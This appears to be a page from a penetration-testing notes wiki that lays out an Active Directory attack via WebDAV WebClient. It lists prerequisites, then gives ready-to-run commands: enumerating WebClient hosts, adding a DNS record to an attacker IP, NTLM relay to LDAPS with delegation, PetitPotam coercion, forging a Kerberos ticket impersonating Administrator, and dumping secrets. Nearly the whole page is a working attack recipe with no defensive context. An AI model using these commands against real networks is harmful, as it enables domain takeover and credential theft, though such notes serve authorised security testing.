WebDAV WebClient

Resource: https://www.bussink.net/rbcd-webclient-attack/

Prerequisites

Domain Controller to have LDAP signing not enforced (default value)
Domain Controller to have LDAPS channel binding not required (default value)
Normal Domain users are able to add machine accounts (default MAQ value is 10)
Normal Domain users are able to create DNS records (or Local Admin access to a device that has internal DNS to set up port forward)
Machines with WebClient enabled

Check if WebClients are enabled

nxc smb scope.txt -d <DOMAIN-FQDN> -u '<USERNAME>' -p '<PASSWORD>' -M webdav

Add a DNS record if DNS resolution is not active

python3 dnstool.py -u '<DOMAIN-FQDN>\<USERNAME>' -p '<PASSWORD>' -a add -r <NS-RECORD-NAME> -d <ATTACKER-IP> <DC-IP>

Set up NTLM relay

sudo ntlmrelayx.py -t ldaps://<DC-IP> --http-port 8080 --delegate-access

Coerce authentication

python3 PetitPotam.py -d <DOMAIN-FQDN> -u '<USERNAME>' -p '<PASSWORD>' '<HOSTNAME-ATTACKER-MACHINE>@8080/a' <WEBCLIENT-ENABLED-HOST-IP>

Create Kerberos ticket

impacket-getST -spn CIFS/<COMPUTER-NAME>.<DOMAIN-FQDN> <DOMAIN-FQDN>/<COMPUTER-USERNAME>\$ -dc-ip <DC-IP> -impersonate Administrator

Dump secrets

export KRB5CCNAME=Administrator.ccache
impacket-secretsdump -k <COMPUTER-NAME>.<DOMAIN-FQDN>

PreviousCVEs NextRelayInformer

Last updated 25 days ago